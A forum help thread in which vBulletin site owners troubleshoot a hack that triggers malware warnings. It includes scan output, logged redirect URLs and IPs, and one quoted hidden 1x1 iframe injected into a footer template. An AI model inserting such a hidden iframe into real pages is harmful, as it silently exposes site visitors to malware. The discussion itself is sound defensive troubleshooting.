Every time we go to the site, we get the warning saying: "fliprap.com contains content from 78.111.51.119, a site known to distribute malaware. Your computer may catch virus"

What should I do? Please help

<a href="http://whatismyipaddress.com/ip/78.111.51.119" target="_blank">http://whatismyipaddress.com/ip/78.111.51.119</a>

Do you have third party content such as adverts?

I'd guess you've been hacked. Have you contacted your host about this so they can help you figure out how this happened?

Hi, it seems your site may have been compromised..

First step:
Run suspect files
Admin CP -> Maintenance -> Diagnostics -> Suspect File Versions
if nothing is wrong in that, disable all plugins..
if that still does not fix it, export your database and search it for that IP address.
If that still doesnt work, check all your files for that IP.

hi
maybe check you r script
or you use some iframe
or check run with clamav

Hi, it seems your site may have been compromised..

First step:
Run suspect files
Admin CP -> Maintenance -> Diagnostics -> Suspect File Versions
if nothing is wrong in that, disable all plugins..
if that still does not fix it, export your database and search it for that IP address.
If that still doesnt work, check all your files for that IP.

I'm having a simular problem, my site appears to be falling apart .. When I run Admin CP -> Maintenance -> Diagnostics -> Suspect File Versions, I sure get a lot of files where it says something like these are not reconized as vBulliten files. Question... what do I do with all the unreconized files that are scattered all over the site?
I also get pop-ups whenever a url is clicked, mostly all misc dot ru extensions.
I have V4.1.9
Thanks

I'm having a simular problem, my site appears to be falling apart .. When I run Admin CP -> Maintenance -> Diagnostics -> Suspect File Versions, I sure get a lot of files where it says something like these are not reconized as vBulliten files. Question... what do I do with all the unreconized files that are scattered all over the site?
I also get pop-ups whenever a url is clicked, mostly all misc dot ru extensions.
I have V4.1.9
Thanks

Could you paste what the output of suspect file versions ?
thanks

If it says:
File not recognized as part of vBulletin
Then that usually just means it is not a default vbulletin file (most likely it is from a modification - you should recognize the names of all your modification files!)

If it says:
File does not contain expected contents
Then that means it recognizes the file (most likely it is a default vbulletin file) but that it has been modified.

Could you paste what the output of suspect file versions ?
thanks

Thanks
Here go's

Diagnostics

Help Suspect File Versions
Scanned 94 files./
blog_search.php File not recognized as part of vBulletin
commons.php File not recognized as part of vBulletin
coms.php File not recognized as part of vBulletin
google5691c1362bc37677.html File not recognized as part of vBulletin
hepad.htm File not recognized as part of vBulletin
jquery.php File not recognized as part of vBulletin
njiyn.htm File not recognized as part of vBulletin
npevz.htm File not recognized as part of vBulletin
okeox.htm File not recognized as part of vBulletin
product-vbh_newtabs10.xml File not recognized as part of vBulletin
tgbpo.htm File not recognized as part of vBulletin
Scanned 70 files./admincp
Scanned 3 files./archive
Scanned 101 files./clientscript
cms_textedit.js File not recognized as part of vBulletin
vbulletin-read-marker.js File not recognized as part of vBulletin
vbulletin-threadbit.js File not recognized as part of vBulletin
vbulletin_global.js File not recognized as part of vBulletin
Scanned 4 files./clientscript/ckeditor
Scanned 60 files./clientscript/ckeditor/lang
Scanned 1 files./clientscript/ckeditor/plugins/a11yhelp
Scanned 1 files./clientscript/ckeditor/plugins/a11yhelp/dialogs
Scanned 2 files./clientscript/ckeditor/plugins/a11yhelp/lang
Scanned 1 files./clientscript/ckeditor/plugins/about
Scanned 1 files./clientscript/ckeditor/plugins/about/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/adobeair
Scanned 1 files./clientscript/ckeditor/plugins/autogrow
Scanned 1 files./clientscript/ckeditor/plugins/basicstyles
Scanned 1 files./clientscript/ckeditor/plugins/bidi
Scanned 1 files./clientscript/ckeditor/plugins/blockquote
Scanned 1 files./clientscript/ckeditor/plugins/button
Scanned 1 files./clientscript/ckeditor/plugins/clipboard
Scanned 1 files./clientscript/ckeditor/plugins/clipboard/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/colorbutton
Scanned 1 files./clientscript/ckeditor/plugins/colordialog
Scanned 1 files./clientscript/ckeditor/plugins/colordialog/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/contextmenu
Scanned 2 files./clientscript/ckeditor/plugins/dialog
Scanned 1 files./clientscript/ckeditor/plugins/dialogadvtab
Scanned 1 files./clientscript/ckeditor/plugins/dialogui
Scanned 1 files./clientscript/ckeditor/plugins/div
Scanned 1 files./clientscript/ckeditor/plugins/div/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/domiterator
Scanned 1 files./clientscript/ckeditor/plugins/editingblock
Scanned 1 files./clientscript/ckeditor/plugins/elementspath
Scanned 1 files./clientscript/ckeditor/plugins/enterkey
Scanned 1 files./clientscript/ckeditor/plugins/entities
Scanned 1 files./clientscript/ckeditor/plugins/fakeobjects
Scanned 1 files./clientscript/ckeditor/plugins/filebrowser
Scanned 1 files./clientscript/ckeditor/plugins/find
Scanned 1 files./clientscript/ckeditor/plugins/find/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/flash
Scanned 1 files./clientscript/ckeditor/plugins/flash/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/floatpanel
Scanned 1 files./clientscript/ckeditor/plugins/font
Scanned 1 files./clientscript/ckeditor/plugins/format
Scanned 1 files./clientscript/ckeditor/plugins/forms
Scanned 8 files./clientscript/ckeditor/plugins/forms/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/horizontalrule
Scanned 1 files./clientscript/ckeditor/plugins/htmldataprocessor
Scanned 1 files./clientscript/ckeditor/plugins/htmlwriter
Scanned 1 files./clientscript/ckeditor/plugins/iframe
Scanned 1 files./clientscript/ckeditor/plugins/iframe/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/iframedialog
Scanned 1 files./clientscript/ckeditor/plugins/image
Scanned 1 files./clientscript/ckeditor/plugins/image/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/indent
Scanned 1 files./clientscript/ckeditor/plugins/justify
Scanned 1 files./clientscript/ckeditor/plugins/keystrokes
Scanned 1 files./clientscript/ckeditor/plugins/link
Scanned 2 files./clientscript/ckeditor/plugins/link/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/list
Scanned 1 files./clientscript/ckeditor/plugins/listblock
Scanned 1 files./clientscript/ckeditor/plugins/liststyle
Scanned 1 files./clientscript/ckeditor/plugins/liststyle/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/maximize
Scanned 1 files./clientscript/ckeditor/plugins/menu
Scanned 1 files./clientscript/ckeditor/plugins/menubutton
Scanned 1 files./clientscript/ckeditor/plugins/newpage
Scanned 1 files./clientscript/ckeditor/plugins/pagebreak
Scanned 1 files./clientscript/ckeditor/plugins/panel
Scanned 1 files./clientscript/ckeditor/plugins/panelbutton
Scanned 1 files./clientscript/ckeditor/plugins/pastefromword
Scanned 1 files./clientscript/ckeditor/plugins/pastefromword/filter
Scanned 1 files./clientscript/ckeditor/plugins/pastetext
Scanned 1 files./clientscript/ckeditor/plugins/pastetext/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/placeholder
Scanned 1 files./clientscript/ckeditor/plugins/placeholder/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/placeholder/lang
Scanned 1 files./clientscript/ckeditor/plugins/popup
Scanned 1 files./clientscript/ckeditor/plugins/preview
Scanned 1 files./clientscript/ckeditor/plugins/print
Scanned 1 files./clientscript/ckeditor/plugins/removeformat
Scanned 1 files./clientscript/ckeditor/plugins/resize
Scanned 1 files./clientscript/ckeditor/plugins/richcombo
Scanned 1 files./clientscript/ckeditor/plugins/save
Scanned 1 files./clientscript/ckeditor/plugins/scayt
Scanned 2 files./clientscript/ckeditor/plugins/scayt/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/selection
Scanned 1 files./clientscript/ckeditor/plugins/showblocks
Scanned 1 files./clientscript/ckeditor/plugins/showborders
Scanned 1 files./clientscript/ckeditor/plugins/smiley
Scanned 1 files./clientscript/ckeditor/plugins/smiley/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/sourcearea
Scanned 1 files./clientscript/ckeditor/plugins/specialchar
Scanned 1 files./clientscript/ckeditor/plugins/specialchar/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/specialchar/lang
Scanned 1 files./clientscript/ckeditor/plugins/styles
Scanned 1 files./clientscript/ckeditor/plugins/styles/styles
Scanned 1 files./clientscript/ckeditor/plugins/stylescombo
Scanned 1 files./clientscript/ckeditor/plugins/tab
Scanned 1 files./clientscript/ckeditor/plugins/table
Scanned 1 files./clientscript/ckeditor/plugins/table/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/tableresize
Scanned 1 files./clientscript/ckeditor/plugins/tabletools
Scanned 1 files./clientscript/ckeditor/plugins/tabletools/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/templates
Scanned 1 files./clientscript/ckeditor/plugins/templates/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/templates/templates
Scanned 1 files./clientscript/ckeditor/plugins/toolbar
Scanned 1 files./clientscript/ckeditor/plugins/uicolor
Scanned 1 files./clientscript/ckeditor/plugins/uicolor/dialogs
Scanned 2 files./clientscript/ckeditor/plugins/uicolor/lang
Scanned 1 files./clientscript/ckeditor/plugins/uicolor/yui
Scanned 1 files./clientscript/ckeditor/plugins/uicolor/yui/assets
Scanned 1 files./clientscript/ckeditor/plugins/undo
Scanned 1 files./clientscript/ckeditor/plugins/wsc
Scanned 4 files./clientscript/ckeditor/plugins/wsc/dialogs
Scanned 1 files./clientscript/ckeditor/plugins/wysiwygarea
Scanned 13 files./clientscript/ckeditor/skins/kama
Scanned 1 files./clientscript/ckeditor/themes/default
Scanned 1 files./clientscript/ckeplugins/attachment
Scanned 1 files./clientscript/ckeplugins/attachment/dialogs
Scanned 1 files./clientscript/ckeplugins/bbcode
Scanned 1 files./clientscript/ckeplugins/codetags
Scanned 1 files./clientscript/ckeplugins/enhancedsourcearea
Scanned 1 files./clientscript/ckeplugins/smiliebox
Scanned 1 files./clientscript/ckeplugins/tablebuttons
Scanned 1 files./clientscript/ckeplugins/vbbutton
Scanned 1 files./clientscript/ckeplugins/vbimage
Scanned 1 files./clientscript/ckeplugins/vbimage/dialogs
Scanned 1 files./clientscript/ckeplugins/vbjustify
Scanned 1 files./clientscript/ckeplugins/vblink
Scanned 2 files./clientscript/ckeplugins/vblink/dialogs
Scanned 1 files./clientscript/ckeplugins/vbremoveformat
Scanned 1 files./clientscript/ckeplugins/vbresize
Scanned 1 files./clientscript/ckeplugins/vbsmiley
Scanned 1 files./clientscript/ckeplugins/vbsmiley/dialogs
Scanned 1 files./clientscript/ckeplugins/vbtable
Scanned 1 files./clientscript/ckeplugins/vbtable/dialogs
Scanned 1 files./clientscript/ckeplugins/vbtextcolor
Scanned 1 files./clientscript/ckeplugins/vbundo
Scanned 1 files./clientscript/ckeplugins/videotag
Scanned 1 files./clientscript/ckeplugins/videotag/dialogs
Scanned 2 files./clientscript/ie7
Scanned 2 files./clientscript/ie8
Scanned 19 files./clientscript/jquery
Scanned 2 files./clientscript/libraries
Scanned 2 files./clientscript/yui
Scanned 2 files./clientscript/yui/animation
Scanned 23 files./clientscript/yui/assets/skins/sam
Scanned 1 files./clientscript/yui/colorpicker
Scanned 1 files./clientscript/yui/colorpicker/assets
Scanned 2 files./clientscript/yui/colorpicker/assets/skins/sam
Scanned 3 files./clientscript/yui/combo
Scanned 3 files./clientscript/yui/connection
Scanned 3 files./clientscript/yui/container
Scanned 2 files./clientscript/yui/container/assets
Scanned 2 files./clientscript/yui/container/assets/skins/sam
Scanned 2 files./clientscript/yui/dragdrop
Scanned 1 files./clientscript/yui/element
Scanned 2 files./clientscript/yui/history
Scanned 1 files./clientscript/yui/json
Scanned 2 files./clientscript/yui/menu
Scanned 3 files./clientscript/yui/menu/assets
Scanned 3 files./clientscript/yui/menu/assets/skins/sam
Scanned 2 files./clientscript/yui/reset-fonts
Scanned 1 files./clientscript/yui/slider
Scanned 2 files./clientscript/yui/slider/assets
Scanned 2 files./clientscript/yui/slider/assets/skins/sam
Scanned 2 files./clientscript/yui/treeview
Scanned 3 files./clientscript/yui/treeview/assets
Scanned 2 files./clientscript/yui/treeview/assets/css/folders
Scanned 3 files./clientscript/yui/treeview/assets/skins/sam
Scanned 2 files./clientscript/yui/uploader
Scanned 1 files./clientscript/yui/utilities
Scanned 2 files./clientscript/yui/yahoo-dom-event
Scanned 2 files./clientscript/yui/yuiloader-dom-event
Scanned 2 files./cpstyles
Scanned 2 files./images/regimage/fonts
Scanned 197 files./includes
adminfunctions_backup.php File not recognized as part of vBulletin
class_blog_search.php File not recognized as part of vBulletin
class_editor_override.php File not recognized as part of vBulletin
functions_wysiwyg.php File not recognized as part of vBulletin
Scanned 4 files./includes/api
Scanned 191 files./includes/api/1
Scanned 22 files./includes/api/2
Scanned 1 files./includes/api/3
Scanned 14 files./includes/api/4
Scanned 7 files./includes/block
Scanned 25 files./includes/cron
Scanned 3 files./includes/facebook
Scanned 8 files./includes/paymentapi
Scanned 29 files./includes/xml
bitfield_vbhtabs.xml File not recognized as part of vBulletin
product-vbh_newtabs10.xml File not recognized as part of vBulletin
Scanned 81 files./install
BAKinstall.php File not recognized as part of vBulletin
authenticate.php File not recognized as part of vBulletin
finalupgrade.php File not recognized as part of vBulletin
install_language_en.php File not recognized as part of vBulletin
installcore.php File not recognized as part of vBulletin
installsteps.php File not recognized as part of vBulletin
upgrade_360.php File not recognized as part of vBulletin
upgrade_360b1.php File not recognized as part of vBulletin
upgrade_360b2.php File not recognized as part of vBulletin
upgrade_360b3.php File not recognized as part of vBulletin
upgrade_360b4.php File not recognized as part of vBulletin
upgrade_360rc1.php File not recognized as part of vBulletin
upgrade_360rc2.php File not recognized as part of vBulletin
upgrade_360rc3.php File not recognized as part of vBulletin
upgrade_361.php File not recognized as part of vBulletin
upgrade_362.php File not recognized as part of vBulletin
upgrade_363.php File not recognized as part of vBulletin
upgrade_364.php File not recognized as part of vBulletin
upgrade_365.php File not recognized as part of vBulletin
upgrade_366.php File not recognized as part of vBulletin
upgrade_367.php File not recognized as part of vBulletin
upgrade_368.php File not recognized as part of vBulletin
upgrade_370.php File not recognized as part of vBulletin
upgrade_370b2.php File not recognized as part of vBulletin
upgrade_370b3.php File not recognized as part of vBulletin
upgrade_370b4.php File not recognized as part of vBulletin
upgrade_370b5.php File not recognized as part of vBulletin
upgrade_370b6.php File not recognized as part of vBulletin
upgrade_370rc1.php File not recognized as part of vBulletin
upgrade_370rc2.php File not recognized as part of vBulletin
upgrade_370rc3.php File not recognized as part of vBulletin
upgrade_370rc4.php File not recognized as part of vBulletin
upgrade_371.php File not recognized as part of vBulletin
upgrade_380.php File not recognized as part of vBulletin
upgrade_380a2.php File not recognized as part of vBulletin
upgrade_380b1.php File not recognized as part of vBulletin
upgrade_380b2.php File not recognized as part of vBulletin
upgrade_380b3.php File not recognized as part of vBulletin
upgrade_380b4.php File not recognized as part of vBulletin
upgrade_380rc1.php File not recognized as part of vBulletin
upgrade_380rc2.php File not recognized as part of vBulletin
upgrade_400.php File not recognized as part of vBulletin
upgrade_400a1.php File not recognized as part of vBulletin
upgrade_400a1_indexes.php File not recognized as part of vBulletin
upgrade_400a2.php File not recognized as part of vBulletin
upgrade_400a3.php File not recognized as part of vBulletin
upgrade_400a4.php File not recognized as part of vBulletin
upgrade_400a5.php File not recognized as part of vBulletin
upgrade_400a6.php File not recognized as part of vBulletin
upgrade_400b1.php File not recognized as part of vBulletin
upgrade_400b2.php File not recognized as part of vBulletin
upgrade_400b3.php File not recognized as part of vBulletin
upgrade_400b4.php File not recognized as part of vBulletin
upgrade_400b5.php File not recognized as part of vBulletin
upgrade_400rc1.php File not recognized as part of vBulletin
upgrade_400rc2.php File not recognized as part of vBulletin
upgrade_400rc3.php File not recognized as part of vBulletin
upgrade_400rc4.php File not recognized as part of vBulletin
upgrade_400rc5.php File not recognized as part of vBulletin
upgrade_401.php File not recognized as part of vBulletin
upgrade_402.php File not recognized as part of vBulletin
upgrade_402_salt.php File not recognized as part of vBulletin
upgrade_language_en.php File not recognized as part of vBulletin
upgradecore.php File not recognized as part of vBulletin
upgrademain.php File not recognized as part of vBulletin
Scanned 3 files./install/cmsdefaultdata
Scanned 90 files./install/includes
Scanned 10 files./modcp
Scanned 1 files./packages/facebook
Scanned 5 files./packages/skimlinks/hooks
Scanned 2 files./packages/vbattach
Scanned 2 files./packages/vbblog/attach
Scanned 3 files./packages/vbblog/search/indexcontroller
Scanned 3 files./packages/vbblog/search/result
Scanned 2 files./packages/vbblog/search/searchcontroller
Scanned 3 files./packages/vbblog/search/type
Scanned 2 files./packages/vbblog/taggablecontent
Scanned 11 files./packages/vbcms
wysiwyghtmlparser.php File not recognized as part of vBulletin
Scanned 2 files./packages/vbcms/attach
Scanned 3 files./packages/vbcms/bbcode
wysiwyg.php File not recognized as part of vBulletin
Scanned 4 files./packages/vbcms/collection
Scanned 6 files./packages/vbcms/collection/content
statichtml.php File not recognized as part of vBulletin
Scanned 6 files./packages/vbcms/content
statichtml.php File not recognized as part of vBulletin
Scanned 7 files./packages/vbcms/controller
editor.php File not recognized as part of vBulletin
Scanned 8 files./packages/vbcms/dm
statichtml.php File not recognized as part of vBulletin
Scanned 2 files./packages/vbcms/exception
Scanned 5 files./packages/vbcms/item
Scanned 6 files./packages/vbcms/item/content
statichtml.php File not recognized as part of vBulletin
Scanned 25 files./packages/vbcms/item/widget
sectionnav.php File not recognized as part of vBulletin
staticbb.php File not recognized as part of vBulletin
Scanned 5 files./packages/vbcms/route
editor.php File not recognized as part of vBulletin
Scanned 4 files./packages/vbcms/search/indexcontroller
statichtml.php File not recognized as part of vBulletin
Scanned 5 files./packages/vbcms/search/result
statichtml.php File not recognized as part of vBulletin
Scanned 5 files./packages/vbcms/search/searchcontroller
newstatichtml.php File not recognized as part of vBulletin
Scanned 4 files./packages/vbcms/search/type
statichtml.php File not recognized as part of vBulletin
Scanned 2 files./packages/vbcms/taggablecontent
Scanned 6 files./packages/vbcms/view
Scanned 25 files./packages/vbcms/widget
sectionnav.php File not recognized as part of vBulletin
staticbb.php File not recognized as part of vBulletin
Scanned 5 files./packages/vbdbsearch
Scanned 4 files./packages/vbforum/attach
Scanned 2 files./packages/vbforum/bbcodehelper
Scanned 2 files./packages/vbforum/bbcodehelper/table
Scanned 3 files./packages/vbforum/collection
Scanned 3 files./packages/vbforum/item
Scanned 6 files./packages/vbforum/search/indexcontroller
Scanned 10 files./packages/vbforum/search/result
Scanned 4 files./packages/vbforum/search/searchcontroller
Scanned 11 files./packages/vbforum/search/type
Scanned 3 files./packages/vbforum/taggablecontent
Scanned 25 files./vb
Scanned 3 files./vb/cache
Scanned 2 files./vb/cache/observer
Scanned 3 files./vb/collection
Scanned 3 files./vb/controller
Scanned 4 files./vb/db
Scanned 4 files./vb/db/mysql
Scanned 15 files./vb/exception
Scanned 3 files./vb/item
Scanned 11 files./vb/legacy
Scanned 3 files./vb/route
Scanned 11 files./vb/search
Scanned 4 files./vb/search/indexcontroller
Scanned 2 files./vb/search/result
Scanned 2 files./vb/search/searchcontroller
Scanned 2 files./vb/search/type
Scanned 2 files./vb/templater
Scanned 6 files./vb/view


Powered by vBulletin? Version 4.1.9 Copyright ? 2011 vBulletin Solutions, Inc. All rights reserved.

hepad.htm File not recognized as part of vBulletin
njiyn.htm File not recognized as part of vBulletin
npevz.htm File not recognized as part of vBulletin
okeox.htm File not recognized as part of vBulletin
tgbpo.htm File not recognized as part of vBulletin

I'd suggest you take a careful look in cpanel (Where you host vbulletin) especially under the forum folder and look in those .htm files. If they have redirect code to other sites then these are bad news.

Assuming you have a good firewall you can probably spot them by simply typing yourdomain.com/forum/njiyn.htm etc etc depending on the root of your board.

I have some of the same extra files as you:
blog_search.php
commons.php
coms.php
jquery.php

But not the HTML files you have.

I'm still having trouble though. I followed the steps suggested:

1. Suspect File Versions. Done, found those extra PHP files above and renamed them.
2. Disabled all plugins (only VBseo)
3. Exported the database, searched the SQL for the offending domain names and IP addresses. None found.
4. Searched through my files for the domain names and IP addresses. None found. (Is it possible that it's encrypted in the files somehow so a search wouldn't find it?)
5. I don't have ads running, so that's not a problem.

Just wondering, do web servers cache files? So if I make a change and refresh (delete my own browser cache first), and I still get virus issues, is it possible the change DID work, except the server has it cached temporarily?

--------------- Added 1325542075 at 1325542075 ---------------

By the way, I found the offending domains/IPs by using Firefox/FireBug, in the "Net" tab it shows all the files requested, and there I saw some files being requested from other domains:

URL, Status, Domain, Size, Remote IP
GET http://44444vvvvv.mefound.com/dng311011/939d46af939990f89693012bcfc3b06a/0.php, 302 Found, 44444vvvvv.mefound.com, 20 B, 95.163.89.230:80
GET http://44444vvvvv.mefound.com/dng311011/939d46af939990f89693012bcfc3b06a/spl.php, 302 Found, 44444vvvvv.mefound.com, 20 B, 95.163.89.230:80
GET http://kokosina.in/t/go.php?sid=5, 302 Found, kokosina.in, 20 B, 46.37.184.227:80

These are the domains/IPs I searched for in the SQL and in the files. I also spotted those PHP files as weird because they had recent "modified" dates whereas the original files were untouched.

Sometimes the added code is encrypted, so you can search for base64 in the plugins.

</div><div style="display:none"><iframe src="http://www.cookaround.com/cook/robots.php" width="1" height="1"></iframe></div>

this iframe seems to be added check the footer template not sure if you want that there

--------------- Added 1325550426 at 1325550426 ---------------

http://www.malwaredomainlist.com/mdl.php?search=78.111.51.119

--------------- Added 1325550515 at 1325550515 ---------------

http://support.clean-mx.de/clean-mx/viruses.php?domain=78.111.51.119&sort=first%20desc

I ended up just replacing the files with a backed up version from before the hack. That was the quickest way, though I never found the hack.

I ended up just replacing the files with a backed up version from before the hack. That was the quickest way, though I never found the hack.

Hello, I am also getting the attached virus pop up, did anyone figure out how to remove the virus yet?

95.163.89.230:80 <--- address blocked, but its not the address for my site, what add on or plugin is causing this?

I disabled all the add on's and I still have the virus, I found all the suspect files the common.php, coms.php, jquery.php ect and deleted them already but I still have this virus issue, It sure would be nice to find the source of this and prevent it from happening in the future.

myke

I've been having a lot of issues with the same stuff. After several attempts to find the bugs, it was determined the server was compromised. I just switched servers with a trusted forum member here and the site was back up in two minutes and runs like a charm.

Just because someone offers hosting doesn't make them a good host...especially if they have clients with a grudge for ripping them off.

...I'm just saying pick your host carefully.

I heard that these malware scripts are getting in to your webserver by hacking your ftp password. What you have to do is find that malware files or code and delete. Submit your website to re-evaluation through google webmaster tools.
Hackers might get your saved password in ftp. So delete history and change the password immediately.
Recent times I am not using ftp. I am uploading zipped files directly through cpanel to prevent from hackers.
We should not blame your host regarding this issue. Hackers getting in to web server through your PC. So clean your PC with any good antivirus.